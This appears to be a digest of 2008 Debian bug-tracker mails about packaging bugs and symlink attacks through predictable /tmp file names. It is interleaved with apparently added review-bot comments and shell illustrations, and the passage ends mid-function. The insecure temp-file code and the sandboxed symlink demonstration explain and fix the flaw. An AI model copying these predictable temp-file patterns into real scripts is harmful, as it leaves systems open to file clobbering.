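Review bot: in the src/scan-mpc.c hunk of 04_taglib_api_calls.dpatch, taglib_tag_free_strings() is now called with no argument after each of the five fields (title, artist, album, comment, genre). A call that takes no pointer cannot be releasing only `val`, so it presumably releases every string the tag API has handed out so far; if that is the case, one call after the genre block would be enough and would make it obvious that no `val` is read after the release. The `## DP: No description.` header should also say what is being fixed, for example that taglib_tag_free_strings() takes no arguments.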
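Review bot: in the src/webserver.c hunk at line 1131, the corrected test `0 == ws_decodepassword(auth,username, password)` relies on 0 meaning success, which is the opposite of the `auth_handler(pwsc,username,password)` call two lines further down, where a non-zero result sets can_dispatch. Since the changelog describes the original defect as checking for a wrong return value, a one-line comment at the call site stating the return convention of ws_decodepassword would keep the two from being confused again, and any other caller of ws_decodepassword deserves a check for the old truthiness test. The `## DP: No description.` header in 03_fix-authentication.dpatch should state that this is the authentication check fix for #496217.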
Processed: reassign 496774 to newsbeuter
Processing commands for [EMAIL PROTECTED]:

# Automatically generated email from bts, devscripts version 2.10.35
reassign 496774 newsbeuter
Bug#496774: libmrss0: depends on a nonexistent package
Bug reassigned from package `libmrss0' to `newsbeuter'.

End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Bug#496772: newsbeuter: depends on a nonexistent package
Hi Riccardo,

* Riccardo Stagni [EMAIL PROTECTED] [2008-08-27 13:53]:
[...]
> (I filed a similar bugreport against libmrss0. If you think it's a fault in
> libnxml, please reassign/merge as appropriate)

I reassigned this one back to newsbeuter as it is only newsbeuter's fault calling libnxml-depends and libmrss-depends in the rules file. A fix is on its way.

Cheers
Nico

--
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
Bug#482140: (no subject)
I experienced the same problem with my notebook. Using Etch Stable (installed from the CD), then upgrading to Lenny (to get my Intel GMA965 chipset working well with 3D). I've got a 32 bits Intel architecture (CPU = pentium M)

I solved the problem by :
- editing my /etc/apt/sources.list to switch back to etch
- apt-get remove docbook-xml (complains many times about update-xmlcatalog: error: entity not registered )
- apt-get update
- apt-get install docbook-xml
- editing /etc/apt/sources.list to update to lenny
- apt-get update
- apt-get dist-upgrade

That did it ;-)

Hope that helps.
Bug#481134: Please hint poppler-data for lenny inclusion
Hideki Yamane wrote:
> So I and other Japanese Debian developer/maintainer/package maintainer/
> users want poppler-data package to there, the CJK languages-desktop tasks
> in tasksel. Please consider that.

The easiest way to have this to happen is by sending a wishlist bug report against tasksel.
Bug#496640: marked as done (anon-proxy: fails to install if /etc/environment is empty)
Your message dated Wed, 27 Aug 2008 13:32:03 + with message-id [EMAIL PROTECTED] and subject line Bug#496640: fixed in anon-proxy 00.05.38+20080710-2 has caused the Debian Bug report #496640, regarding anon-proxy: fails to install if /etc/environment is empty to be marked as done.

This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.)

-- 
496640: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496640
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems

---BeginMessage---
Package: anon-proxy
Version: 00.05.38+20080710-1
Severity: serious
Justification: Policy 6.1.

If /etc/environment is empty, installation or removing/purging of anon-proxy fails. The reason is the grep call in line 50 of anon-proxy.postinst fails, if /etc/environment is empty. The same applies to line 29 of anon-proxy.prerm.

As a result aptitude won't install/remove/upgrade any other package, making the system unusable/breaking security updates, etc.

Workaround: create/remove/edit /etc/environment to be either a file with at least a 'space' in it or to be removed.
Johannes -- System Information: Debian Release: lenny/sid APT prefers testing APT policy: (500, 'testing') Architecture: i386 (x86_64) Kernel: Linux 2.6.25-2-amd64 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages anon-proxy depends on: ii adduser 3.110 add and remove users and groups ii debconf [debconf-2.0] 1.5.22 Debian configuration management sy ii libc6 2.7-13 GNU C Library: Shared libraries ii libgcc1 1:4.3.1-2 GCC support library ii libssl0.9.8 0.9.8g-13 SSL shared libraries ii libstdc++64.3.1-2The GNU Standard C++ Library v3 ii libxerces-c28 2.8.0-3validating XML parser library for anon-proxy recommends no packages. Versions of packages anon-proxy suggests: pn mixmaster none (no description available) pn mixminion none (no description available) ii tor 0.2.0.30-2 anonymizing overlay network for TC -- debconf information: * anon-proxy/environment: true ---End Message--- ---BeginMessage--- Source: anon-proxy Source-Version: 00.05.38+20080710-2 We believe that the bug you reported is fixed in the latest version of anon-proxy, which is due to be installed in the Debian FTP archive: anon-proxy_00.05.38+20080710-2.diff.gz to pool/main/a/anon-proxy/anon-proxy_00.05.38+20080710-2.diff.gz anon-proxy_00.05.38+20080710-2.dsc to pool/main/a/anon-proxy/anon-proxy_00.05.38+20080710-2.dsc anon-proxy_00.05.38+20080710-2_i386.deb to pool/main/a/anon-proxy/anon-proxy_00.05.38+20080710-2_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. 
David Spreen [EMAIL PROTECTED] (supplier of updated anon-proxy package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Wed, 27 Aug 2008 06:05:40 -0700 Source: anon-proxy Binary: anon-proxy Architecture: source i386 Version: 00.05.38+20080710-2 Distribution: unstable Urgency: low Maintainer: David Spreen [EMAIL PROTECTED] Changed-By: David Spreen [EMAIL PROTECTED] Description: anon-proxy - Proxy to surf the web anonymously Closes: 491932 492613 496640 Changes: anon-proxy (00.05.38+20080710-2) unstable; urgency=low . * Translation updates and rc-fix release for Lenny. * Updated Finnish debconf translation (Closes: #492613). * Updated Swedish debconf translation (Closes: #491932). * debian/postinst debian/prerm: - Don't ever let grep call return 1 to prevent package from installing, upgrading or purging due to empty /etc/environment file. Fixes RC bug. (Closes: 496640). Checksums-Sha1: 5b66ffbfc3a37425e9678ecc0cc297d139af18c6 1173 anon-proxy_00.05.38+20080710-2.dsc 7b71079b1a35c7ce15e596061131f5dd9ec5238a 22435 anon-proxy_00.05.38+20080710-2.diff.gz 589466e39566b80a7f370d38addac23621886b46 128284 anon-proxy_00.05.38+20080710-2_i386.deb Checksums-Sha256: da50f7b70a364efe59fe8ef9af904e6e28795e8ff63f92ef12812841bb42700b 1173
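The failure mode reported in Bug#496640, as an added example that is not taken from the anon-proxy maintainer scripts: grep exits 1 when it selects no lines, which an empty file always triggers, and a script running under `set -e` aborts on that status. The pattern, the function names and the sample file contents are assumptions made for the illustration.

```shell
#!/bin/sh
# Added illustration, not the anon-proxy postinst/prerm. The pattern,
# function names and sample file contents are assumptions.

# Fragile form: grep exits 1 when it selects no lines, which is always
# the case for an empty file. The function returns that status, and a
# maintainer script running under "set -e" would abort at this call,
# leaving dpkg with a package it can neither configure nor remove.
strip_proxy_fragile() {
    grep -v '^http_proxy=' "$1" > "$1.new" && mv "$1.new" "$1"
}

# Robust form: status 1 only means "no lines selected" and is accepted.
# Status 2 and above is a real error (for example a missing or
# unreadable file) and is still reported to the caller.
strip_proxy_robust() {
    status=0
    grep -v '^http_proxy=' "$1" > "$1.new" || status=$?
    if [ "$status" -gt 1 ]; then
        rm -f "$1.new"
        return "$status"
    fi
    mv "$1.new" "$1"
}

# Demonstration on a constructed, empty stand-in for /etc/environment.
demo_dir=$(mktemp -d) || exit 1
: > "$demo_dir/environment"
if strip_proxy_fragile "$demo_dir/environment"; then
    echo "fragile form on empty file: exit 0"
else
    echo "fragile form on empty file: exit $? (fatal under set -e)"
fi
if strip_proxy_robust "$demo_dir/environment"; then
    echo "robust form on empty file: exit 0"
else
    echo "robust form on empty file: exit $?"
fi
rm -rf "$demo_dir"
```

Treating every grep failure as success with a bare `|| true` would also hide status 2, so the robust form keeps that case visible.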
Processed: Re: The possibility of attack with the help of symlinks in some Debian packages
Processing commands for [EMAIL PROTECTED]:

tags 496395 confirmed patch
Bug#496395: The possibility of attack with the help of symlinks in some Debian packages
Tags were: security
Tags added: confirmed, patch

thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Bug#481134: Please hint poppler-data for lenny inclusion
On Wed, 2008-08-27 at 15:58 +0200, Christian Perrier wrote:

Hideki Yamane wrote:

So I and other Japanese Debian developer/maintainer/package maintainer/ users want poppler-data package to there, the CJK languages-desktop tasks in tasksel. Please consider that.

The easiest way to have this to happen is by sending a wishlist bug report against tasksel.

Though I'm not a maintainer of tasksel stuff, I think it's valid to suggest the same to be done for Chinese (both simplified and traditional) and Korean tasks as well, so that we save some bug number count :)

-- 
Regards, Deng Xiyue, a.k.a. manphiz
Bug#496001: marked as done (python-coverage: Missing Depends: python-pkg-resources)
Your message dated Wed, 27 Aug 2008 13:32:06 + with message-id [EMAIL PROTECTED] and subject line Bug#496001: fixed in python-coverage 2.80-2 has caused the Debian Bug report #496001, regarding python-coverage: Missing Depends: python-pkg-resources to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 496001: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496001 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: python-coverage Version: 2.80-1 Severity: serious It appears python-coverage should depend on python-pkg-resources: $ python-coverage Traceback (most recent call last): File /usr/bin/python-coverage, line 5, in module from pkg_resources import load_entry_point ImportError: No module named pkg_resources $ python-coverage -e Traceback (most recent call last): File /usr/bin/python-coverage, line 5, in module from pkg_resources import load_entry_point ImportError: No module named pkg_resources $ apt-file search pkg_resources python-pkg-resources: /usr/share/doc/python-pkg-resources/pkg_resources.txt.gz python-pkg-resources: /usr/share/pyshared/pkg_resources.py python-wxgtk2.8: /usr/lib/python2.4/site-packages/wx-2.8-gtk2-unicode/wx/tools/Editra/src/extern/pkg_resources.py python-wxgtk2.8: /usr/lib/python2.5/site-packages/wx-2.8-gtk2-unicode/wx/tools/Editra/src/extern/pkg_resources.py After installing python-pkg-resoures, I get no error message at least running the above commands. 
Sami -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26.2 (SMP w/4 CPU cores; PREEMPT) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages python-coverage depends on: ii python2.5.2-2An interactive high-level object-o ii python-central0.6.8 register and build utility for Pyt python-coverage recommends no packages. python-coverage suggests no packages. -- no debconf information ---End Message--- ---BeginMessage--- Source: python-coverage Source-Version: 2.80-2 We believe that the bug you reported is fixed in the latest version of python-coverage, which is due to be installed in the Debian FTP archive: python-coverage_2.80-2.diff.gz to pool/main/p/python-coverage/python-coverage_2.80-2.diff.gz python-coverage_2.80-2.dsc to pool/main/p/python-coverage/python-coverage_2.80-2.dsc python-coverage_2.80-2_all.deb to pool/main/p/python-coverage/python-coverage_2.80-2_all.deb python-coverage_2.80.orig.tar.gz to pool/main/p/python-coverage/python-coverage_2.80.orig.tar.gz A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. 
Ben Finney [EMAIL PROTECTED] (supplier of updated python-coverage package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Fri, 22 Aug 2008 10:02:53 +1000 Source: python-coverage Binary: python-coverage Architecture: source all Version: 2.80-2 Distribution: unstable Urgency: medium Maintainer: Lars Wirzenius [EMAIL PROTECTED] Changed-By: Ben Finney [EMAIL PROTECTED] Description: python-coverage - code coverage tool for Python Closes: 496001 Changes: python-coverage (2.80-2) unstable; urgency=medium . [ Ben Finney ] * debian/control + Fix missing Depends: python-pkg-resources. Thanks to Sami Liedes for the bug report. (Closes: bug#496001) Checksums-Sha1: f4211cabf5194b3257571cfcbd80a60fc5b032f3 1224 python-coverage_2.80-2.dsc 182ce686920567fa5f3a44b665d7f66fcc86cf58 13751 python-coverage_2.80.orig.tar.gz dbbec3510cbbd6ea552a164f0132d63e6b968400 3891 python-coverage_2.80-2.diff.gz 8dafd31b6d2c3bc581adf69d495f2d04e7b8573c 19262 python-coverage_2.80-2_all.deb Checksums-Sha256: 15c917e64ff5d79cc6a29176512eaf36b2e7add0b65455c3155298cc4d7aafd7 1224 python-coverage_2.80-2.dsc a212da669fa5ec813479555e079bdde0d6d016daa9fe253528b0a4a579dacb22 13751 python-coverage_2.80.orig.tar.gz
Bug#496395: The possibility of attack with the help of symlinks in some Debian packages
tags 496395 confirmed patch thanks Dmitry E. Oboukhov wrote: Package: apertium Severity: grave Hi, maintainer! This message about the error concerns a few packages at once. I've tested all the packages (for Lenny) on my Debian mirror. All scripts of packages (marked as executable) were tested. Two patches fixing these issues are attached. Cheers, Moritz --- apertium-3.0.7+1.orig/apertium/Makefile.in 2008-03-31 06:22:55.0 +0200 +++ apertium-3.0.7+1/apertium/Makefile.in 2008-08-23 19:37:13.0 +0200 
@@ -1148,25 +1148,29 @@ @echo Creating apertium-gen-deformat script @echo #!$(BASH) $@ @cat deformat-header.sh $@ + @echo TMP_DEFORMAT=\`mktemp\` $@ + @echo TMP_LEX=\`mktemp\` $@ @echo $(XMLLINT) --dtdvalid $(apertiumdir)/format.dtd --noout \$$FILE1 \\ $@ @if [ `basename $(XSLTPROC)` == xsltproc ]; \ - then echo $(XSLTPROC) --stringparam mode \$$MODE $(apertiumdir)/deformat.xsl \$$FILE1 /tmp/\$$\$$.deformat.l \\; \ - else echo $(XSLTPROC) $(apertiumdir)/deformat.xsl \$$FILE1 $$mode=\$$MODE\ /tmp/\$$\$$.deformat.l \\; \ + then echo $(XSLTPROC) --stringparam mode \$$MODE $(apertiumdir)/deformat.xsl \$$FILE1 \$$TMP_DEFORMAT \\; \ + else echo $(XSLTPROC) $(apertiumdir)/deformat.xsl \$$FILE1 $$mode=\$$MODE\ \$$TMP_DEFORMAT \\; \ fi $@ - @echo $(FLEX) \$$FLEXOPTS -o/tmp/\$$\$$.lex.cc /tmp/\$$\$$.deformat.l \\ $@ - @echo $(CXX) $(CXXFLAGS) -w $(APERTIUM_CFLAGS) -I $(apertiuminclude) -o \$$FILE2 /tmp/\$$\$$.lex.cc \\ $@ - @echo rm /tmp/\$$\$$.deformat.l /tmp/\$$\$$.lex.cc $@ + @echo $(FLEX) \$$FLEXOPTS -o \$$TMP_LEX \$$TMP_DEFORMAT \\ $@ + @echo $(CXX) $(CXXFLAGS) -w $(APERTIUM_CFLAGS) -I $(apertiuminclude) -o \$$FILE2 \$$TMP_LEX \\ $@ + @echo rm \$$TMP_DEFORMAT \$$TMP_LEX $@ @chmod a+x $@ apertium-gen-reformat: Makefile.am gen-header.sh @echo Creating apertium-gen-reformat script @echo #!$(BASH) $@ @cat gen-header.sh $@ + @echo TMP_REFORMAT=\`mktemp\` $@ + @echo TMP_LEX=\`mktemp\` $@ @echo $(XMLLINT) --dtdvalid $(apertiumdir)/format.dtd --noout \$$FILE1 \\ $@ - @echo $(XSLTPROC) $(apertiumdir)/reformat.xsl \$$FILE1 /tmp/\$$\$$.reformat.l \\ $@ - @echo $(FLEX) \$$FLEXOPTS -o/tmp/\$$\$$.lex.cc /tmp/\$$\$$.reformat.l \\ $@ - @echo $(CXX) $(CXXFLAGS) -w $(APERTIUM_CFLAGS) -I $(apertiuminclude) -o \$$FILE2 /tmp/\$$\$$.lex.cc \\ $@ - @echo rm /tmp/\$$\$$.reformat.l /tmp/\$$\$$.lex.cc $@ + @echo $(XSLTPROC) $(apertiumdir)/reformat.xsl \$$FILE1 \$$TMP_REFORMAT \\ $@ + @echo $(FLEX) \$$FLEXOPTS -o \$$TMP_LEX \$$TMP_REFORMAT \\ $@ + @echo $(CXX) $(CXXFLAGS) -w $(APERTIUM_CFLAGS) -I 
$(apertiuminclude) -o \$$FILE2 \$$TMP_LEX \\ $@ + @echo rm \$$TMP_REFORMAT \$$TMP_LEX $@ @chmod a+x $@ apertium-gen-modes: Makefile.am modes-header.sh --- apertium-3.0.7+1.orig/apertium/apertium-header.sh 2008-02-05 07:49:07.0 +0100 +++ apertium-3.0.7+1/apertium/apertium-header.sh 2008-08-23 21:41:12.0 +0200 @@ -38,17 +38,17 @@ function translate_odt { - INPUT_TMPDIR=/tmp/$$odtdir + INPUT_TMPDIR=`mktemp` locale_utf8 test_zip if [[ $FICHERO == ]] - then FICHERO=/tmp/$$odtorig + then FICHERO=`mktemp` cat $FICHERO BORRAFICHERO=true fi - OTRASALIDA=/tmp/$$odtsalida.zip + OTRASALIDA=/tmp/$RANDOM-$RANDOM-$RANDOM-odtsalida.zip unzip -q -o -d $INPUT_TMPDIR $FICHERO find $INPUT_TMPDIR | grep content\\\.xml |\ @@ -78,17 +78,17 @@ function translate_docx { - INPUT_TMPDIR=/tmp/$$docxdir + INPUT_TMPDIR=`mktemp` locale_utf8 test_zip if [[ $FICHERO == ]] - then FICHERO=/tmp/$$docxorig + then FICHERO=`mktemp` cat $FICHERO BORRAFICHERO=true fi - OTRASALIDA=/tmp/$$docxsalida.zip + OTRASALIDA=/tmp/$RANDOM-$RANDOM-$RANDOM-docxsalida.zip if [[ $UWORDS == no ]] then OPCIONU=-u; @@ -98,8 +98,9 @@ unzip -q -o -d $INPUT_TMPDIR $FICHERO for i in $(find $INPUT_TMPDIR|grep xlsx$); - do $APERTIUM_PATH/apertium -f xlsx -d $DIRECTORY $OPCIONU $PREFIJO $i /tmp/$$xlsxembed; - mv /tmp/$$xlsxembed $i; + TMP_XLSXEMBED=`mktemp` + do $APERTIUM_PATH/apertium -f xlsx -d $DIRECTORY $OPCIONU $PREFIJO $i $TMP_XLSXEMBED; + mv $TMP_XLSXEMBED $i; done; find $INPUT_TMPDIR | grep xml |\ @@ -130,17 +131,17 @@ function translate_xlsx { - INPUT_TMPDIR=/tmp/$$xlsxdir + INPUT_TMPDIR=`mktemp` locale_utf8 test_zip if [[ $FICHERO == ]] - then FICHERO=/tmp/$$xlsxorig + then FICHERO=`mktemp` cat $FICHERO BORRAFICHERO=true fi - OTRASALIDA=/tmp/$$xslxsalida.zip + OTRASALIDA=/tmp/$RANDOM-$RANDOM-$RANDOM-xslxsalida.zip unzip -q -o -d $INPUT_TMPDIR $FICHERO find $INPUT_TMPDIR | grep sharedStrings.xml |\
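Review bot: In the apertium-gen-deformat and apertium-gen-reformat rules of Makefile.in, the generated C++ source moves from /tmp/$$.lex.cc to the bare mktemp name in TMP_LEX, so the file handed to $(CXX) no longer ends in .cc. The compiler driver picks the language from the suffix and passes a file with an unrecognised suffix to the linker instead of compiling it. Put -x c++ in front of \$$TMP_LEX in the $(CXX) line, or create the file under a .cc name inside a directory obtained from mktemp -d.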
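Review bot: In translate_odt, translate_docx and translate_xlsx of apertium-header.sh, INPUT_TMPDIR=`mktemp` creates a regular file, yet the variable is used as a directory right afterwards (unzip -q -o -d $INPUT_TMPDIR, find $INPUT_TMPDIR); this needs mktemp -d. In the same three functions OTRASALIDA=/tmp/$RANDOM-$RANDOM-$RANDOM-odtsalida.zip (and the docx and xslx variants) is still a name assembled by the script and not created exclusively, so the output zip keeps the problem the patch is meant to remove. Placing the zip inside the directory returned by mktemp -d would cover it.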
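Review bot: In the translate_docx loop (hunk @@ -98,8 +98,9 @@), the added TMP_XLSXEMBED=`mktemp` sits between the for $(find $INPUT_TMPDIR|grep xlsx$); line and do, which is a shell syntax error. Move the assignment to be the first statement after do, so each iteration gets a fresh file that the following mv then consumes.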
Processed: tagging 417142
Processing commands for [EMAIL PROTECTED]:

# Automatically generated email from bts, devscripts version 2.10.29~bpo40+1
tags 417142 pending
Bug#417142: depends on non-essential package debconf in postrm
Tags were: patch etch-ignore
Tags added: pending

End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Processed: Re: The possibility of attack with the help of symlinks in some Debian packages
Processing commands for [EMAIL PROTECTED]:

severity 496402 normal
Bug#496402: The possibility of attack with the help of symlinks in some Debian packages
Severity set to `normal' from `grave'

thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Bug#417142: NMU for websvn
Hi Pierre, This RC bug has now been open for two weeks. I'm uploading an NMU to the delayed-5 queue according to the attached patch. I hope this helps to keep websvn in good shape in lenny. cheers, Thijs diff -u websvn-2.0/debian/changelog websvn-2.0/debian/changelog --- websvn-2.0/debian/changelog +++ websvn-2.0/debian/changelog @@ -1,3 +1,10 @@ +websvn (2.0-2.1) unstable; urgency=high + + * Non-maintainer upload. + * Fix unconditional use of debconf in postrm (Closes: #417142). + + -- Thijs Kinkhorst [EMAIL PROTECTED] Wed, 27 Aug 2008 15:56:07 +0200 + websvn (2.0-2) unstable; urgency=low * Upload to unstable diff -u websvn-2.0/debian/postrm websvn-2.0/debian/postrm --- websvn-2.0/debian/postrm +++ websvn-2.0/debian/postrm @@ -1,10 +1,12 @@ #! /bin/sh -# post remove script for wzdftpd +# post remove script for websvn set -e -. /usr/share/debconf/confmodule -db_version 2.0 || [ $? -lt 30 ] +if [ -f /usr/share/debconf/confmodule ]; then + . /usr/share/debconf/confmodule + db_version 2.0 || [ $? -lt 30 ] +fi case $1 in purge) @@ -14,22 +16,24 @@ ucf -p /etc/websvn/svn_deb_conf.inc || true rm -rf /var/cache/websvn/ - db_get websvn/webservers - webservers=$RET - restart= - - for webserver in $webservers; do - webserver=${webserver%,} - - case $webserver in -apache|apache-perl|apache-ssl|apache2) -rm -f /etc/$webserver/conf.d/websvn -test -x /usr/sbin/$webserver || continue -restart=$restart $webserver - ;; - esac - done + if [ -f /usr/share/debconf/confmodule ]; then + db_get websvn/webservers + webservers=$RET + restart= + + for webserver in $webservers; do +webserver=${webserver%,} + +case $webserver in + apache|apache-perl|apache-ssl|apache2) + rm -f /etc/$webserver/conf.d/websvn + test -x /usr/sbin/$webserver || continue + restart=$restart $webserver +;; +esac + done + fi ;; esac @@ -47,7 +51,9 @@ #DEBHELPER# -db_stop +if [ -f /usr/share/debconf/confmodule ]; then + db_stop +fi exit 0 pgpeSFffM82rv.pgp Description: PGP signature
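Review bot: In the purge branch of debian/postrm, the whole webserver loop now sits inside the [ -f /usr/share/debconf/confmodule ] test, so when debconf has already been removed the rm -f /etc/$webserver/conf.d/websvn lines never run and those conf.d entries survive a purge. The case pattern already names the candidates (apache, apache-perl, apache-ssl, apache2), so an else branch could loop over that fixed list instead of the db_get result. restart= is also initialised only inside the guard; setting it before the if keeps it defined for anything that reads it later in the script.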
Bug#496402: The possibility of attack with the help of symlinks in some Debian packages
severity 496402 normal
thanks

On Sun, Aug 24, 2008 at 10:05:29PM +0400, Dmitry E. Oboukhov wrote:

Package: aegis
Severity: grave

Hi, maintainer!

This message about the error concerns a few packages at once. I've tested all the packages (for Lenny) on my Debian mirror. All scripts of packages (marked as executable) were tested.

The affected scripts are only examples, lowering severity.

Cheers,
Moritz
Bug#483337: marked as done (mt-daapd: FTBFS: scan-mpc.c:73: error: too many arguments to function 'taglib_tag_free_strings')
Your message dated Wed, 27 Aug 2008 14:02:03 + with message-id [EMAIL PROTECTED] and subject line Bug#483337: fixed in mt-daapd 0.9~r1696-1.4 has caused the Debian Bug report #483337, regarding mt-daapd: FTBFS: scan-mpc.c:73: error: too many arguments to function 'taglib_tag_free_strings' to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 483337: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=483337 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: mt-daapd Version: 0.9~r1696-1.3 Severity: serious User: [EMAIL PROTECTED] Usertags: qa-ftbfs-20080527 qa-ftbfs Justification: FTBFS on i386 Hi, During a rebuild of all packages in sid, your package failed to build on i386. Relevant part: if i486-linux-gnu-gcc -DHAVE_CONFIG_H -I. -I. -I.. 
-g -Wall -DWITH_HOWL -DOGGVORBIS -DFLAC -DMUSEPACK -DHAVE_SQL -DHOST='i486-pc-linux-gnu' -DNOT_HAVE_SA_LEN -DUSES_NETLINK -DHAVE_LINUX -I/usr/include/avahi-compat-howl -I/usr/include/ffmpeg -Wall -g -DHAVE_VA_COPY -O2 -MT scan-mpc.o -MD -MP -MF .deps/scan-mpc.Tpo -c -o scan-mpc.o scan-mpc.c; \ then mv -f .deps/scan-mpc.Tpo .deps/scan-mpc.Po; else rm -f .deps/scan-mpc.Tpo; exit 1; fi scan-mpc.c: In function 'scan_get_mpcinfo': scan-mpc.c:73: error: too many arguments to function 'taglib_tag_free_strings' scan-mpc.c:79: error: too many arguments to function 'taglib_tag_free_strings' scan-mpc.c:85: error: too many arguments to function 'taglib_tag_free_strings' scan-mpc.c:91: error: too many arguments to function 'taglib_tag_free_strings' scan-mpc.c:97: error: too many arguments to function 'taglib_tag_free_strings' scan-mpc.c:46: warning: unused variable 'f' make[4]: *** [scan-mpc.o] Error 1 The full build log is available from: http://people.debian.org/~lucas/logs/2008/05/27 This rebuild was done with gcc 4.3 instead of gcc 4.2, because gcc 4.3 is now the default on most architectures (even if it's not the case on i386 yet). Consequently, many failures are caused by the switch to gcc 4.3. If you determine that this failure is caused by gcc 4.3, feel free to downgrade this bug to 'important' if your package is only built on i386, and this bug is specific to gcc 4.3 (i.e the package builds fine with gcc 4.2). A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! About the archive rebuild: The rebuild was done on about 50 AMD64 nodes of the Grid'5000 platform, using a clean chroot containing a sid i386 environment. Internet was not accessible from the build systems. 
-- | Lucas Nussbaum | [EMAIL PROTECTED] http://www.lucas-nussbaum.net/ | | jabber: [EMAIL PROTECTED] GPG: 1024D/023B3F4F | ---End Message--- ---BeginMessage--- Source: mt-daapd Source-Version: 0.9~r1696-1.4 We believe that the bug you reported is fixed in the latest version of mt-daapd, which is due to be installed in the Debian FTP archive: mt-daapd_0.9~r1696-1.4.diff.gz to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4.diff.gz mt-daapd_0.9~r1696-1.4.dsc to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4.dsc mt-daapd_0.9~r1696-1.4_amd64.deb to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Nico Golde [EMAIL PROTECTED] (supplier of updated mt-daapd package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Wed, 27 Aug 2008 14:53:45 +0200 Source: mt-daapd Binary: mt-daapd Architecture: source amd64 Version: 0.9~r1696-1.4 Distribution: unstable Urgency: low Maintainer: Joshua Kwan [EMAIL PROTECTED] Changed-By: Nico Golde [EMAIL PROTECTED] Description: mt-daapd - iTunes-compatible DAAP server Closes: 483337 496217 Changes: mt-daapd (0.9~r1696-1.4) unstable; urgency=low . * Fix authentication upstream patch checking for a wrong return value (03_fix-authentication.dpatch; Closes: #496217). * Fix taglib api calls (04_taglib_api_calls.dpatch; Closes: #483337) Checksums-Sha1: a481b039be558819f8bc140717368c7ff765badb 1161 mt-daapd_0.9~r1696-1.4.dsc 6fb99300b305f8016f5f27af32281620b7bb8ee0 20572
Bug#496371: [Pkg-lustre-maintainers] Bug#496371: The possibility of attack with the help of symlinks in some Debian packages
This one time, at band camp, Patrick Winnertz said:

Thanks Stephen,

tmpfile=$(mktemp /tmp/iozone.XX)

I know that this way it is possible. But as the user should find the log afterwards I would prefer to use /tmp/iozone.log or something else, nothing random. But as I wrote in my previous email I don't have an idea how to fix this without using mktemp.

You can echo what file to look at.

-- 
Stephen Gran [EMAIL PROTECTED]
Debian user, admin, and developer
http://www.debian.org
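The suggestion made in this exchange, as an added example that is not part of the original mails: create the log with mktemp and print its path, shown beside the fixed-name form it replaces. The function names and the sandbox layout are assumptions; a private directory stands in for /tmp so the comparison can be run safely.

```shell
#!/bin/sh
# Added illustration; function names and the sandbox are assumptions.

# Fixed, predictable log name: the redirection opens whatever already
# exists at that path, so a symlink placed there beforehand decides
# which file is truncated and written.
write_log_fixed() {
    dir=$1
    printf 'iozone results\n' > "$dir/iozone.log"
    printf '%s\n' "$dir/iozone.log"
}

# mktemp picks an unpredictable name and creates the file exclusively,
# so an existing symlink is never followed. The path is printed so the
# user still knows where to find the log.
write_log_mktemp() {
    dir=$1
    log=$(mktemp "$dir/iozone.XXXXXXXXXX") || return 1
    printf 'iozone results\n' > "$log"
    printf '%s\n' "$log"
}

# Constructed sandbox: "$sb/tmp" plays the role of /tmp, "$sb/victim"
# is an unrelated file, and the symlink is already in place at the
# predictable log name.
make_sandbox() {
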